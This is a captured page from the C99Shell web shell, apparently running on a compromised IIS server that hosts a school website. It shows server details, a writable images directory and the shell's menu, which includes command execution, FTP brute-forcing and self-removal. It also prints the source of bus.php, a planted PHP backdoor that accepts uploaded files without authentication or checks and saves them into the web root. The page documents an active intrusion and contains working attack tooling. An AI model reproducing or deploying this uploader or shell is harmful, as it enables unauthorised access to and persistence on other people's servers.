!C99Shell v. 2.1 [PHP 8 Update] [02.02.2022]!

Software: Microsoft-IIS/10.0. PHP/7.4.33 

uname -a: Windows NT LAKE 10.0 build 20348 (Windows Server 2016) AMD64 

IWPD_801(traduongco) 

Safe-mode: OFF (not secure)

E:\thcsltv.edu.vn\httpdocs\images\   drwxrwxrwx
Free 224.53 GB of 400 GB (56.13%)
Detected drives: [ a ] [ c ] [ d ] [ e ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     bus.php (1.07 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
if(isset($_POST['upl_files'])){
  echo 
'<div id="unCenter"><div class="Marged"><div class="Table">
        <div>Uploaded Files:<br></div>'
;
  
//print_r($_FILES['file_n']);
  
$up_mas $_FILES['file_n'];
  
$mas_name = array();
  
$mas_tmp = array();
  for(
$i=0$i<3$i++){
    if(!empty(
$up_mas['name'][$i])){
      
$j count($mas_name);
      
$mas_name[$j] = $up_mas['name'][$i];
      
$mas_tmp[$j] = $up_mas['tmp_name'][$i];
      }
    }
  for(
$i=0$i<count($mas_name); $i++){
    
$upl_file './'.$mas_name[$i];
    if(
move_uploaded_file($mas_tmp[$i], $upl_file)){
      echo 
'<a href="'.$mas_name[$i].'">'.$mas_name[$i].'</a>,&nbsp';
      }
    }
  }
?>
            <center>
            <form enctype="multipart/form-data" method="post" action="">
            <?php
          
for($i=0$i<3$i++){
            echo 
'<div><input class="Input" type="file" name="file_n[]"></div>';
            } 
?>
            <div><input type="reset" name="reset" value="Reset">&nbsp;<input type="submit" name="upl_files" value="upload"></div>
            </center>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.1 [PHP 8 Update] [02.02.2022] maintained byC99Shell Github | Generation time: 1.3425 ]--